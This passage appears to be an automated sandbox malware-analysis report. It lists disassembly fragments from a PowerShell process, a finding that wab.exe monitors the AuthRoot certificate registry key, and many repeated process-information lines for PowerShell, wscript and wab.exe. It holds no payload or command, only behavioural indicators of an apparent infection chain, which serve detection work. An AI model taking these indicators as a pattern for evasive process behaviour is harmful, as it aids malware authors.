Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_09120126 push cs; retf	5_2_0912017A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0911DD5B push ecx; retf	5_2_0911DD86
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0911DD45 push eax; ret	5_2_0911DD46
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0912199C push ebp; retf	5_2_09121A0E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_091221A3 push ds; iretd	5_2_091221A4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0911E5A3 push ebx; retf	5_2_0911E5BA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0911D9AC push ebx; retf	5_2_0911DABA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0911D9AC push FFFFFFD6h; retf	5_2_0911DAC6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_091231C3 push ds; retf	5_2_091231C9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_091239C4 push 00000069h; retf	5_2_091239C6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_091205EC push ecx; retf	5_2_091205F2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0911D004 push ebp; ret	5_2_0911D00C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0911CC3E push ebx; ret	5_2_0911CC4E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0911D84A push 00000001h; iretd	5_2_0911D852
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_09124476 push ebx; ret	5_2_0912448A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_09123C82 push ebx; ret	5_2_09123C8A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_09122084 push eax; ret	5_2_091220EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0911FC8A push ds; retf	5_2_0911FCAA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_091220B2 push eax; ret	5_2_091220EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_091234BA push ebp; iretd	5_2_091234C2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_091240DF push A6FE4245h; ret	5_2_091240E9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0911ECF6 push edx; retf	5_2_0911ECFE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_09120F03 push ebx; retf	5_2_09120F0A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_09124B03 push edx; ret	5_2_09124B06
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_09122F06 push ecx; retf	5_2_09122F7E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_09122F5C push ecx; retf	5_2_09122F7E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_09122349 push edi; retf	5_2_0912234A

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
